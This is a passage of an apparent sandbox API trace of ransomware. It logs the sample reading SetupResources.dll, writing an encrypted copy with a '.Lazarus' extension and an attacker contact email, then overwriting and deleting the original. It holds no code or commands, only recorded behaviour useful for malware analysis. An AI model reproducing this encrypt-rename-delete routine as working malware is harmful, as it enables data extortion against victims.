Flags=0x0, Size=0x5c) returned 0x71960 [0069.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0069.762] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.762] GetFileType (hFile=0x410) returned 0x1 [0069.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0069.762] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0069.762] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0069.763] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0069.763] CloseHandle (hObject=0x410) returned 1 [0069.763] AreFileApisANSI () returned 1 [0069.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0069.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0069.763] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.763] GetFileType (hFile=0x410) returned 0x1 [0069.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0069.763] CloseHandle (hObject=0x410) returned 1 [0069.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0069.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0069.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0069.764] AreFileApisANSI () returned 1 [0069.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0069.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0069.764] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0069.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0069.764] AreFileApisANSI () returned 1 [0069.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0069.774] GetLastError () returned 0x0 [0069.774] SetLastError (dwErrCode=0x0) [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0069.774] GetLastError () returned 0x0 [0069.774] SetLastError (dwErrCode=0x0) [0069.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0069.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0069.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0069.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0069.775] AreFileApisANSI () returned 1 [0069.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0069.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0069.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0069.775] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.776] GetFileType (hFile=0x410) returned 0x1 [0069.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0069.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0069.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0069.777] AreFileApisANSI () returned 1 [0069.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0069.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0069.777] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.777] GetFileType (hFile=0x428) returned 0x1 [0069.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0069.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0069.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.777] GetLastError () returned 0x0 [0069.777] SetLastError (dwErrCode=0x0) [0069.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.777] GetLastError () returned 0x0 [0069.777] SetLastError (dwErrCode=0x0) [0069.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.777] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0069.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0069.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0069.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0069.780] GetLastError () returned 0x0 [0069.780] SetLastError (dwErrCode=0x0) [0069.780] GetLastError () returned 0x0 [0069.780] SetLastError (dwErrCode=0x0) [0069.780] GetLastError () returned 0x0 [0069.780] SetLastError (dwErrCode=0x0) [0069.780] GetLastError () returned 0x0 [0069.780] SetLastError (dwErrCode=0x0) [0069.780] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.780] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.782] GetLastError () returned 0x0 [0069.782] SetLastError (dwErrCode=0x0) [0069.782] GetLastError () returned 0x0 [0069.782] SetLastError (dwErrCode=0x0) [0069.782] GetLastError () returned 0x0 [0069.782] SetLastError (dwErrCode=0x0) [0069.782] GetLastError () returned 0x0 [0069.782] SetLastError (dwErrCode=0x0) [0069.782] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.782] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.783] GetLastError () returned 0x0 [0069.783] SetLastError (dwErrCode=0x0) [0069.783] GetLastError () returned 0x0 [0069.783] SetLastError (dwErrCode=0x0) [0069.783] GetLastError () returned 0x0 [0069.783] SetLastError (dwErrCode=0x0) [0069.783] GetLastError () returned 0x0 [0069.783] SetLastError (dwErrCode=0x0) [0069.783] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.783] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.784] GetLastError () returned 0x0 [0069.784] SetLastError (dwErrCode=0x0) [0069.784] GetLastError () returned 0x0 [0069.784] SetLastError (dwErrCode=0x0) [0069.784] GetLastError () returned 0x0 [0069.784] SetLastError (dwErrCode=0x0) [0069.784] GetLastError () returned 0x0 [0069.784] SetLastError (dwErrCode=0x0) [0069.784] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0069.784] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.784] GetLastError () returned 0x0 [0069.784] SetLastError (dwErrCode=0x0) [0069.785] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0069.785] GetLastError () returned 0x0 [0069.785] SetLastError (dwErrCode=0x0) [0069.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0069.785] GetLastError () returned 0x0 [0069.785] SetLastError (dwErrCode=0x0) [0069.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0069.785] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0069.785] GetLastError () returned 0x0 [0069.785] SetLastError (dwErrCode=0x0) [0069.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.785] GetLastError () returned 0x0 [0069.786] SetLastError (dwErrCode=0x0) [0069.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0069.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0069.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0069.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0069.786] CloseHandle (hObject=0x410) returned 1 [0069.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.787] CloseHandle (hObject=0x428) returned 1 [0069.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.787] AreFileApisANSI () returned 1 [0069.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0069.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0069.788] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.788] GetFileType (hFile=0x428) returned 0x1 [0069.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0069.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.789] GetLastError () returned 0xb7 [0069.789] SetLastError (dwErrCode=0xb7) [0069.789] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0069.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.793] CloseHandle (hObject=0x428) returned 1 [0069.794] AreFileApisANSI () returned 1 [0069.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0069.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0069.794] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0069.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.795] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6f7, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧莐\x07̧비聐蔘\x08賂̧")) returned 0 [0069.795] FindClose (in: hFindFile=0x78390 | out: hFindFile=0x78390) returned 1 [0069.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0069.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0069.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 